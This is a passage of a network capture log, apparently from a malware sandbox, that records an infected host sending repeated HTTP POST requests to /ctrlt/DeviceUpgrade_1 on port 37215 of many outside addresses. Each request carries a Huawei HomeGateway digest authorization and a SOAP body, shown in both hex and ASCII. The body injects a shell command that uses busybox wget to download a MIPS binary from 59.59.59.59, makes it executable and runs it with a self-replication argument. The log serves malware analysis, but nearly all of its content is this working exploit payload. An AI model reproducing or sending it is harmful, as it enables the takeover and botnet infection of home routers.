                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          769192.168.2.1540552197.4.243.19237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.664050102 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          770192.168.2.1538206197.254.139.1537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.664074898 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          771192.168.2.154983864.126.210.8237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.668828964 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          772192.168.2.1537464197.31.58.1037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.668848038 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          773192.168.2.1558400172.179.222.15037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.668909073 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          774192.168.2.155462641.247.41.21837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.668930054 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          775192.168.2.1553486157.105.179.18137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.668975115 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          776192.168.2.1539054157.82.124.14537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.668998957 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          777192.168.2.1552544157.43.100.437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.668998957 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          778192.168.2.1554862137.100.60.23537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.669024944 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
